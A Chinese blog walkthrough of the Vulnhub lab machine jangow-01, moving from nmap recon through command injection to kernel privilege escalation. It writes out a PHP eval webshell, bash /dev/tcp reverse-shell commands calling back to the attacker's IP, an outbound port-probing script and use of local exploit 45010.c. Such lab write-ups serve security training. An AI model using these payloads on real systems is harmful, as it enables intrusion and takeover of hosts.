Vulnhub靶机:jangow-01-1.0.1

本文详细描述了一次针对Vulnhub靶机JANGOW_1.0.1的渗透攻击过程,包括信息收集、利用网页命令执行漏洞、反弹shell、通过端口转发和内核提权最终获取flag。
摘要由CSDN通过智能技术生成

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:jangow01(10.0.2.4)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/

二、信息收集

使用nmap主机发现,靶机ip为10.0.2.4

在这里插入图片描述

使用nmap进行端口扫描,发现靶机开放端口:21、80

在这里插入图片描述

打开网站如下

在这里插入图片描述
在这里插入图片描述

把网站的按钮都点一边,发现页面

在这里插入图片描述

在buscar后面输入ls命令,发现命令执行漏洞

在这里插入图片描述

三、漏洞利用

尝试写入webshell:echo '<?php @eval($_POST["x"]);?>)' >> shell.php

在这里插入图片描述

使用蚁剑连接,连接成功,低权限用户

在这里插入图片描述
在这里插入图片描述
反弹shell,发现报错

bash -i >& /dev/tcp/10.0.2.15/9999 0>&1

查看/bin/sh指向,可以看到/bin/sh指向dash,而我们使用的shell环境为bash

ls -al /bin/sh

在这里插入图片描述

使用bash -c指令进行反弹shell,反弹失败,可以猜测存在端口限制

bash -c 'bash -i >& /dev/tcp/10.0.2.15/9999 0>&1'

在这里插入图片描述

由于本人技术有限,看了其他大佬的解题思路,可以在kali上把1-65535所有端口绑定到某个端口上,并对其监听

sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234

在靶机上运行如下脚本进行探测(注意格式需要为Unix格式!)

# !/bin/bash
for i in $(seq 1 65535)
do
    timeout 1 nc -vz 10.0.2.15 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done
echo "all port done"

在这里插入图片描述

在这里插入图片描述

执行完毕,在同一文件夹下出现out.txt文件,发现开放端口443

在这里插入图片描述

在这里插入图片描述

重启kali,消除端口绑定命令,使用443端口进行反弹shell,反弹成功

在这里插入图片描述
在这里插入图片描述

四、提权

查看系统内核版本,发现靶机的内核版本是Ubuntu 4.4.0-31,应该可以内核漏洞提权

less /proc/version

在这里插入图片描述

搜索对应的内核版本的提权脚本

searchsploit ubuntu 4.4.0-31

在这里插入图片描述

选择45010.c脚本

searchsploit -m 45010.c

在这里插入图片描述

使用蚁剑将脚本上传到靶机上,编译执行,提权成功

在这里插入图片描述
在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:Vulnhub靶机:JANGOW_ 1.0.1-CSDN博客

  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值